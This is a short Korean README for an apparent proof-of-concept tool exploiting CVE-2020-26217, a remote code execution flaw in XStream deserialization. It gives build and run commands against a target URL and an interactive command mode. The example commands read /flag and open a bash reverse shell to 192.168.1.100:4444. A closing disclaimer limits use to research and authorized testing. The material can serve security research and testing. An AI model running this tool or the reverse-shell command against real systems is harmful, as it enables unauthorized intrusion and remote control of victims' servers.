
CVE-2020-26217 XStream 역직렬화 PoC
XStream 원격 코드 실행 취약점 도구입니다.
CVE-2020-26217은 XStream 라이브러리의 역직렬화 취약점으로, 공격자는 악의적인 XML 데이터를 구성하여 원격 코드 실행을 유발할 수 있습니다.
영향받는 버전: XStream <= 1.4.13
go run poc.go <대상 URL>
# 도구 실행
go run poc.go http://target.com:8080/?data
# 인터랙티브 모드 진입 후 명령 입력
cmd> whoami
cmd> cat /flag
cmd> bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
cmd> exit
go build -o poc poc.go
본 도구는 보안 연구 및 인가된 테스트 목적으로만 사용해야 하며, 불법적인 용도로 사용해서는 안 됩니다. 사용자는 관련 법적 책임을 스스로 부담해야 합니다.